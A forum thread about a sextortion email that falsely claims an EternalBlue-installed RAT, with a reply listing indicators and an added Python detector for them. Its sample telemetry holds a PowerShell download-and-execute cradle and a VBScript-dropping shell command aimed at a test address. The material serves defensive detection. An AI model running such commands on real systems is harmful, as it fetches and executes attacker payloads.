Extortion Scam Claims EternalBlue Was Used to Install a Backdoor

silversurfer

An extortion scam is being distributed that claims a Remote Access Trojan, or RAT, was installed on your computer using the EternalBlue exploit. The scammers then go on to say that they used the RAT to take videos of you on adult web sites and that you must pay a ransom or they will send it to all of your contacts.

EternalBlue is an exploit allegedly created by the NSA that targets a vulnerability in the SMBv1 protocol. This vulnerability allows attackers to execute commands on a vulnerable computer that can be used to install malware.

The extortion emails being distributed have a subject of "Security Alert. Your account was compromised. Password must be changed" and spin a tale that, while you were visiting a porn site, the EternalBlue exploit was triggered to install a Remote Access Trojan on your computer.

This Trojan was then allegedly used to take videos of you, steal your contacts, and your passwords. It goes on to say if you do not pay a $600 extortion demand, the attacker will send your video to all of your contacts.

Extortion Email

The reality is that this is just a scam and the senders have not utilized any exploits on your computer, there is no RAT installed, and there are no videos of you while using an adult web site. Any passwords or email addresses listed in the email are simply from data breaches where your account info was publicly disclosed.
 

TairikuOkami

I love BP news; they always list source articles with tech details, many ways to mitigate it.
Like a firewall: even if it would inject into an allowed process, only TCP 80/443 are usually allowed.
Some DNS services are pretty fast in blocking DNS requests made to C2 servers to slow them down.
  • This particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server
  • PowerShell (-ExecutionPolicy bypass -noprofile) obtains a payload from an attacker-controlled website
  • It downloads a payload via non-standard TCP ports (1541/45988)
  • It connects to a command and control (C2) server
  • Gh0st RAT uses DNS requests
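The indicators listed in the reply above (a shell writing and running a .vbs file, PowerShell started with an execution-policy bypass, outbound TCP to ports other than 80/443, DNS lookups of known C2 names) are the kind of thing an endpoint sensor already records. The following is an added example, not code from the thread or from BleepingComputer: a small rule set run over constructed Sysmon-style process, network and DNS records. The event shapes, the 80/443-only egress policy, the blocklisted domains (reserved .invalid names) and the addresses (RFC 5737 test ranges) are all assumptions made for the demonstration.

```python
"""Flag the indicators from the post above over constructed endpoint telemetry.

Added example, not code from the original thread. The event shapes, addresses
(RFC 5737 test ranges), domains (reserved .invalid names), blocklist and the
80/443-only egress policy are all assumptions made for the demonstration.
"""
import re

# Assumed egress policy: workstations only need outbound TCP 80/443; anything
# else (such as 1541 or 45988 in the post) is flagged.
ALLOWED_TCP_EGRESS = {80, 443}

# Constructed stand-in for a DNS filtering feed of known C2 domains.
DNS_BLOCKLIST = {"c2.example.invalid", "beacon.example.invalid"}

# powershell.exe accepts unique parameter prefixes, so match -ep, -ex, -exec,
# -ExecutionPolicy followed by "bypass", and -nop / -NoProfile.
PS_BYPASS = re.compile(r"-(?:ep|ex[a-z]*)\s+bypass", re.IGNORECASE)
PS_NOPROFILE = re.compile(r"-nop[a-z]*\b", re.IGNORECASE)
# A shell redirecting text into a .vbs file, or launching one with wscript/cscript.
VBS_DROP = re.compile(r">\s*\"?[^\s\"]+\.vbs\b", re.IGNORECASE)
VBS_RUN = re.compile(r"\b[wc]script(?:\.exe)?\s+\"?[^\s\"]+\.vbs\b", re.IGNORECASE)

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events, allowed_ports=ALLOWED_TCP_EGRESS, dns_blocklist=DNS_BLOCKLIST):
    """Return one finding dict (rule, image, detail) per matched indicator."""
    findings = []
    for ev in events:
        image = basename(ev.get("image", ""))
        kind = ev.get("type")
        if kind == "process":
            cmd = ev.get("cmdline", "")
            if image in {"powershell.exe", "pwsh.exe"} and PS_BYPASS.search(cmd):
                detail = "execution policy bypass"
                if PS_NOPROFILE.search(cmd):
                    detail += " with -NoProfile"
                findings.append({"rule": "ps_execpolicy_bypass", "image": image, "detail": detail})
            if image in SHELLS and (VBS_DROP.search(cmd) or VBS_RUN.search(cmd)):
                findings.append({"rule": "shell_drops_vbscript", "image": image, "detail": cmd})
        elif kind == "network":
            port = int(ev["dst_port"])
            if ev.get("proto", "tcp").lower() == "tcp" and port not in allowed_ports:
                findings.append({"rule": "nonstandard_egress", "image": image,
                                 "detail": f"{ev['dst_ip']}:{port}"})
        elif kind == "dns":
            q = ev.get("query", "").lower().rstrip(".")
            # Match the blocklisted name itself and any subdomain of it.
            if any(q == d or q.endswith("." + d) for d in dns_blocklist):
                findings.append({"rule": "dns_blocklisted_c2", "image": image, "detail": q})
    return findings


# Constructed sample telemetry in the shape a Sysmon-style sensor emits.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo Set o=CreateObject("MSXML2.XMLHTTP") > C:\Users\Public\u.vbs && wscript.exe C:\Users\Public\u.vbs'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -NoProfile -c \"IEX((New-Object Net.WebClient).DownloadString('http://198.51.100.7:1541/p'))\""},
    {"type": "network", "image": "powershell.exe", "proto": "tcp", "dst_ip": "198.51.100.7", "dst_port": 1541},
    {"type": "network", "image": "powershell.exe", "proto": "tcp", "dst_ip": "198.51.100.7", "dst_port": 45988},
    {"type": "network", "image": "chrome.exe", "proto": "tcp", "dst_ip": "203.0.113.5", "dst_port": 443},  # benign
    {"type": "dns", "image": "svchost.exe", "query": "update.c2.example.invalid"},
    {"type": "dns", "image": "chrome.exe", "query": "www.example.com"},  # benign
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['rule']:<22} {f['image']:<16} {f['detail']}")
```

The egress rule is the one that does the real work here: with only TCP 80/443 allowed outbound, both payload fetches on 1541 and 45988 show up regardless of which process made them, which is the point the reply makes about firewalls. The PowerShell rule deliberately matches the abbreviated switches (-ep, -ex, -nop) because a rule that only looks for the spelled-out -ExecutionPolicy is trivially sidestepped.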
